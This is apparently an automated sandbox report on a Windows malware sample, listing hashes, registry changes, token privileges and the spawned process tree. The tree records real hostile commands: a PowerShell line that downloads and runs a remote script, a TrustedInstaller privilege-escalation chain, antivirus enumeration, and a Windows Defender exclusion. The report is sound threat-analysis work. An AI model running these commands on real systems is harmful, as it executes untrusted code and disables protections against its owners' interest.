5c53130b90f4f30685808b7b19a04751fb4ea3b922f5fab599df88bbe7cfc529

Analysis

max time kernel
147s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
05/03/2024, 13:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SecuriteInfo.com.FileRepMalware.11759.14067.exe
Size

1.3MB
MD5

5a1233c02e6cc4579e49d7202d847a2d
SHA1

57a710d0fdb3ef443a02382f933f591a6493ee74
SHA256

5c53130b90f4f30685808b7b19a04751fb4ea3b922f5fab599df88bbe7cfc529
SHA512

d7f0991ffc7683f12e68f5daab7a52286cf6852fdcfee16514c096fd0d1fe9e8d175478378506f98ff19dae91b6bacc66516bb8b65593de7db9763552b4d7d3e
SSDEEP

24576:rdofGAmSIQ177wZ+A7MjiiRDXU/Sat5RgsLSmIOHsU5zMmX1xYwncqKvGqmXaj:rdofGbSIQ177wZvYjiiRDXASat5RgsLS

Score

10^/10

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 1252 created 680	1252	powershell.exe	7

Blocklisted process makes network request 1 IoCs

flow	pid	Process
13	2508	powershell.exe

Launches sc.exe 2 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1736	sc.exe
648	sc.exe

Modifies data under HKEY_USERS 47 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-18\SymbolicLinkValue = "\\Registry\\User\\S-1-5-21-566096764-1992588923-1249862864-1000"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe

Suspicious behavior: EnumeratesProcesses 15 IoCs

pid	Process
1124	SecuriteInfo.com.FileRepMalware.11759.14067.exe
1124	SecuriteInfo.com.FileRepMalware.11759.14067.exe
2508	powershell.exe
2508	powershell.exe
1252	powershell.exe
1252	powershell.exe
1252	powershell.exe
1252	powershell.exe
1380	powershell.exe
1380	powershell.exe
3368	SecuriteInfo.com.FileRepMalware.11759.14067.exe
3368	SecuriteInfo.com.FileRepMalware.11759.14067.exe
4108	powershell.exe
4108	powershell.exe
4108	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	868	whoami.exe
Token: SeDebugPrivilege	2508	powershell.exe
Token: SeDebugPrivilege	2116	whoami.exe
Token: SeDebugPrivilege	1252	powershell.exe
Token: SeDebugPrivilege	376	whoami.exe
Token: SeDebugPrivilege	376	whoami.exe
Token: SeDebugPrivilege	376	whoami.exe
Token: SeDebugPrivilege	376	whoami.exe
Token: SeDebugPrivilege	376	whoami.exe
Token: SeDebugPrivilege	376	whoami.exe
Token: SeDebugPrivilege	376	whoami.exe
Token: SeDebugPrivilege	376	whoami.exe
Token: SeDebugPrivilege	376	whoami.exe
Token: SeDebugPrivilege	376	whoami.exe
Token: SeDebugPrivilege	376	whoami.exe
Token: SeDebugPrivilege	376	whoami.exe
Token: SeDebugPrivilege	376	whoami.exe
Token: SeDebugPrivilege	376	whoami.exe
Token: SeDebugPrivilege	376	whoami.exe
Token: SeDebugPrivilege	376	whoami.exe
Token: SeDebugPrivilege	376	whoami.exe
Token: SeDebugPrivilege	376	whoami.exe
Token: SeDebugPrivilege	376	whoami.exe
Token: SeDebugPrivilege	376	whoami.exe
Token: SeDebugPrivilege	376	whoami.exe
Token: SeDebugPrivilege	376	whoami.exe
Token: SeDebugPrivilege	376	whoami.exe
Token: SeDebugPrivilege	376	whoami.exe
Token: SeDebugPrivilege	376	whoami.exe
Token: SeDebugPrivilege	376	whoami.exe
Token: SeDebugPrivilege	1380	powershell.exe
Token: SeDebugPrivilege	4212	whoami.exe
Token: SeDebugPrivilege	4212	whoami.exe
Token: SeDebugPrivilege	4212	whoami.exe
Token: SeDebugPrivilege	4212	whoami.exe
Token: SeDebugPrivilege	4212	whoami.exe
Token: SeDebugPrivilege	4212	whoami.exe
Token: SeDebugPrivilege	4212	whoami.exe
Token: SeDebugPrivilege	4212	whoami.exe
Token: SeSecurityPrivilege	1380	powershell.exe
Token: SeTakeOwnershipPrivilege	1380	powershell.exe
Token: SeBackupPrivilege	1380	powershell.exe
Token: SeRestorePrivilege	1380	powershell.exe
Token: SeDebugPrivilege	428	whoami.exe
Token: SeCreateTokenPrivilege	1292	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	1292	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1292	WMIC.exe
Token: SeSecurityPrivilege	1292	WMIC.exe
Token: SeTakeOwnershipPrivilege	1292	WMIC.exe
Token: SeLoadDriverPrivilege	1292	WMIC.exe
Token: SeSystemtimePrivilege	1292	WMIC.exe
Token: SeBackupPrivilege	1292	WMIC.exe
Token: SeRestorePrivilege	1292	WMIC.exe
Token: SeShutdownPrivilege	1292	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1292	WMIC.exe
Token: SeUndockPrivilege	1292	WMIC.exe
Token: SeManageVolumePrivilege	1292	WMIC.exe
Token: 31	1292	WMIC.exe
Token: 32	1292	WMIC.exe
Token: SeCreateTokenPrivilege	1292	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	1292	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1292	WMIC.exe
Token: SeSecurityPrivilege	1292	WMIC.exe
Token: SeTakeOwnershipPrivilege	1292	WMIC.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
1124	SecuriteInfo.com.FileRepMalware.11759.14067.exe
1124	SecuriteInfo.com.FileRepMalware.11759.14067.exe
3368	SecuriteInfo.com.FileRepMalware.11759.14067.exe
3368	SecuriteInfo.com.FileRepMalware.11759.14067.exe

Suspicious use of WriteProcessMemory 30 IoCs

description	pid	Process	procid_target
PID 1124 wrote to memory of 3096	1124	SecuriteInfo.com.FileRepMalware.11759.14067.exe	89
PID 1124 wrote to memory of 3096	1124	SecuriteInfo.com.FileRepMalware.11759.14067.exe	89
PID 1124 wrote to memory of 868	1124	SecuriteInfo.com.FileRepMalware.11759.14067.exe	91
PID 1124 wrote to memory of 868	1124	SecuriteInfo.com.FileRepMalware.11759.14067.exe	91
PID 1124 wrote to memory of 2508	1124	SecuriteInfo.com.FileRepMalware.11759.14067.exe	92
PID 1124 wrote to memory of 2508	1124	SecuriteInfo.com.FileRepMalware.11759.14067.exe	92
PID 2508 wrote to memory of 2116	2508	powershell.exe	96
PID 2508 wrote to memory of 2116	2508	powershell.exe	96
PID 2508 wrote to memory of 1252	2508	powershell.exe	97
PID 2508 wrote to memory of 1252	2508	powershell.exe	97
PID 1252 wrote to memory of 376	1252	powershell.exe	99
PID 1252 wrote to memory of 376	1252	powershell.exe	99
PID 1252 wrote to memory of 1736	1252	powershell.exe	100
PID 1252 wrote to memory of 1736	1252	powershell.exe	100
PID 1252 wrote to memory of 648	1252	powershell.exe	101
PID 1252 wrote to memory of 648	1252	powershell.exe	101
PID 1252 wrote to memory of 1380	1252	powershell.exe	102
PID 1252 wrote to memory of 1380	1252	powershell.exe	102
PID 1380 wrote to memory of 4212	1380	powershell.exe	104
PID 1380 wrote to memory of 4212	1380	powershell.exe	104
PID 1380 wrote to memory of 3368	1380	powershell.exe	106
PID 1380 wrote to memory of 3368	1380	powershell.exe	106
PID 3368 wrote to memory of 4516	3368	SecuriteInfo.com.FileRepMalware.11759.14067.exe	107
PID 3368 wrote to memory of 4516	3368	SecuriteInfo.com.FileRepMalware.11759.14067.exe	107
PID 3368 wrote to memory of 428	3368	SecuriteInfo.com.FileRepMalware.11759.14067.exe	109
PID 3368 wrote to memory of 428	3368	SecuriteInfo.com.FileRepMalware.11759.14067.exe	109
PID 3368 wrote to memory of 1292	3368	SecuriteInfo.com.FileRepMalware.11759.14067.exe	110
PID 3368 wrote to memory of 1292	3368	SecuriteInfo.com.FileRepMalware.11759.14067.exe	110
PID 3368 wrote to memory of 4108	3368	SecuriteInfo.com.FileRepMalware.11759.14067.exe	111
PID 3368 wrote to memory of 4108	3368	SecuriteInfo.com.FileRepMalware.11759.14067.exe	111

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:680
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -win 1 -nop -c iex $env:R; # RunAsTI
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1380
- - C:\Windows\system32\whoami.exe
    "C:\Windows\system32\whoami.exe" /groups
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4212
- - C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.FileRepMalware.11759.14067.exe
    "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.FileRepMalware.11759.14067.exe" /restart
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:3368
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd
      4⤵
      PID:4516
  - - C:\Windows\SYSTEM32\whoami.exe
      whoami /user
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:428
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Where displayName!='Windows Defender'
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1292
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Add-MpPreference -ExclusionPath ((gp 'HKCU:\Volatile Environment').R8PCMD) -Force
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4108

C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.FileRepMalware.11759.14067.exe
"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.FileRepMalware.11759.14067.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1124
- C:\Windows\SYSTEM32\cmd.exe
  cmd
  2⤵
  PID:3096
- C:\Windows\SYSTEM32\whoami.exe
  whoami /user
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:868
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -nop irm revert8plus.gitlab.io/release/ti.ps1|iex
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2508
- - C:\Windows\system32\whoami.exe
    "C:\Windows\system32\whoami.exe" /user
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2116
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win 1 -nop -c $cmd='C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.FileRepMalware.11759.14067.exe'; $arg='/restart'; $id='RunAsTI'; $key='Registry::HKU\S-1-5-21-566096764-1992588923-1249862864-1000\Volatile Environment'; $env:R=(gi $key -ea 0).getvalue($id)-join''; iex $env:R
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1252
  - - C:\Windows\system32\whoami.exe
      "C:\Windows\system32\whoami.exe" /groups
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:376
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" start TrustedInstaller
      4⤵
      Launches sc.exe
      PID:1736
  - - C:\Windows\system32\sc.exe
      "C:\Windows\system32\sc.exe" start lsass
      4⤵
      Launches sc.exe
      PID:648

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
56c43715e0e7fa58012d8a5769d8d568

SHA1
4370ca3436f2e3a95b47a728503a2c22a5a5fa39

SHA256
8ef51b68725d9ddcda70f9f7ef24686ff3cb4a00f7d2dce79d10027ed63dfed5

SHA512
b8da8defb2080d04babc3e676cc9686c7f71b15eeca0e738ca75c9fb7af968eba8d3daff5bc2e31d471e26568df2f319ec1f4b00bf43ffb60460e5df787947ed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4d40dcdd10b5b2e256c230c935fa3b41

SHA1
49f6b274954b059eac8ae5f1dd933c2414b5887e

SHA256
3f3507966ae5a545243d08af7de6918599a345344058bb688092a332870c175d

SHA512
255a0e00927876a082cf323ec1ca6fd08f8618b6067d943f31470f364b4eaba560ec963657e0c489dbc1779ab38706fb0f7546728f68f80bccfd974f6fd378ec

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5b2256e206eebe83cf8d0bac1db70e5a

SHA1
ef73b5579951567cbf553827554de54b7e92cc37

SHA256
0a0290055db5e12253ded72e5ea15a86e9d3aa3fefee2d76105780807820cac1

SHA512
52a2e6c7357658f699db44228e20a5a8eef09d2765280d3fbca2a33010661255d94b22af934ad50307a12ff83fda7ca21a45cb7e70161d0d5efedc1b6aa26f93

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3xm3fyvy.03d.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1252-24-0x000001BC6B6D0000-0x000001BC6B6E0000-memory.dmp

Filesize
64KB

Download
memory/1252-33-0x00007FFCF5570000-0x00007FFCF6031000-memory.dmp

Filesize
10.8MB

Download
memory/1252-31-0x000001BC6B6D0000-0x000001BC6B6E0000-memory.dmp

Filesize
64KB

Download
memory/1252-25-0x000001BC6B6D0000-0x000001BC6B6E0000-memory.dmp

Filesize
64KB

Download
memory/1252-18-0x00007FFCF5570000-0x00007FFCF6031000-memory.dmp

Filesize
10.8MB

Download
memory/1380-47-0x000001B440D50000-0x000001B440D60000-memory.dmp

Filesize
64KB

Download
memory/1380-48-0x000001B440D50000-0x000001B440D60000-memory.dmp

Filesize
64KB

Download
memory/1380-69-0x000001B440D50000-0x000001B440D60000-memory.dmp

Filesize
64KB

Download
memory/1380-68-0x000001B440D50000-0x000001B440D60000-memory.dmp

Filesize
64KB

Download
memory/1380-67-0x000001B440D50000-0x000001B440D60000-memory.dmp

Filesize
64KB

Download
memory/1380-34-0x00007FFCF5570000-0x00007FFCF6031000-memory.dmp

Filesize
10.8MB

Download
memory/1380-35-0x000001B440D50000-0x000001B440D60000-memory.dmp

Filesize
64KB

Download
memory/1380-45-0x000001B440D50000-0x000001B440D60000-memory.dmp

Filesize
64KB

Download
memory/1380-66-0x00007FFCF5570000-0x00007FFCF6031000-memory.dmp

Filesize
10.8MB

Download
memory/2508-0-0x000001F30A340000-0x000001F30A362000-memory.dmp

Filesize
136KB

Download
memory/2508-16-0x00007FFCF5570000-0x00007FFCF6031000-memory.dmp

Filesize
10.8MB

Download
memory/2508-10-0x00007FFCF5570000-0x00007FFCF6031000-memory.dmp

Filesize
10.8MB

Download
memory/2508-11-0x000001F322590000-0x000001F3225A0000-memory.dmp

Filesize
64KB

Download
memory/2508-12-0x000001F322590000-0x000001F3225A0000-memory.dmp

Filesize
64KB

Download
memory/2508-13-0x000001F322D20000-0x000001F322EE2000-memory.dmp

Filesize
1.8MB

Download
memory/4108-49-0x00007FFCF5570000-0x00007FFCF6031000-memory.dmp

Filesize
10.8MB

Download
memory/4108-50-0x00000209DB410000-0x00000209DB420000-memory.dmp

Filesize
64KB

Download
memory/4108-63-0x00007FFCF5570000-0x00007FFCF6031000-memory.dmp

Filesize
10.8MB

Download